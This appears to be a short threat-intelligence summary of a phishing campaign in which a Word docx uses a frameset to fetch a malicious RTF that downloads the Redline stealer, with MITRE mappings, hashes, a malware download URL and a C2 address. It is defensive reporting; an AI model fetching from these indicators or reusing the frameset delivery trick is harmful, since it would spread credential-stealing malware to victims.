Threat Research

Malicious Word Document with a Frameset

Securonix

A Word OOXML document (docx) is used as a downloader by embedding a frameset that loads a second-stage payload when opened. The phishing sample “Order Confirmation 22839.docx” first delivers a malicious RTF (“92.doc”) which downloads the final malware, the Redline stealer, from a remote URL and then communicates with a C2 server. #RedlineStealer #CVE-2022-30190

Keypoints

  • A new downloader technique uses Word OOXML framesets to pull in a second-stage payload from an external source.
  • The frameset is defined in webSettings.xml and references an external file via an rId relationship.
  • The phishing document is named “Order Confirmation 22839.docx” and has a recorded SHA-256 hash.
  • The second-stage payload (“92.doc”) is a malicious RTF document that then downloads the real malware from a remote URL.
  • The final payload is the Redline stealer, identified by its SHA-256 hash and a dedicated C2 server.
  • Word OOXML ZIP container manipulation enables the frameset-based delivery without embedding obvious malicious code.
  • The report cites ISC SANS as the source and provides several hashes and network indicators for observability.

MITRE Techniques

  • [T1566.001] Phishing: Attachment – The document is delivered via a phishing campaign and named “Order Confirmation 22839.docx.” – “delivered via phishing campaign and called ‘Order Confirmation 22839.docx’…”
  • [T1204.002] User Execution: Malicious File – The payload is triggered after user interaction, with a popup displayed to interact with the user. – “…payload will be automatically downloaded with interaction with the user. Just a popup will be displayed.”
  • [T1105] Ingress Tool Transfer – The second-stage payload (“92.doc”) downloads the real malware from the remote URL. – “It downloads the real malware from the following URL: hxxp://107[.]172[.]44[.]187/92/vbc.exe”
  • [T1071.001] Web Protocols – The final malware (Redline stealer) communicates with a C2 server. – “The malware is a Redline stealer … talking to the following C2 server: 171[.]22[.]30[.]129:54686”

Indicators of Compromise

  • [File name] Order Confirmation 22839.docx – context: phishing document used as the lure
  • [File name] 92.doc – context: second-stage payload (malicious RTF) referenced by the frameset
  • [URL] hxxp://107[.]172[.]44[.]187/92/vbc.exe – context: URL used to download the final malware
  • [IP] 171.22.30.129:54686 – context: Redline stealer C2 server
  • [SHA256] 2382d4957569aed12896aa8ca2cc9d2698217e53c9ab5d52799e4ea0920aa9b9 – context: SHA256 of the Order Confirmation 22839.docx
  • [SHA256] 7d2b174c017d61fcd94673c55f730821fbc30d7cf03fb493563a122d73466aab – context: SHA256 of the Redline stealer

Read more: https://isc.sans.edu/diary/rss/29052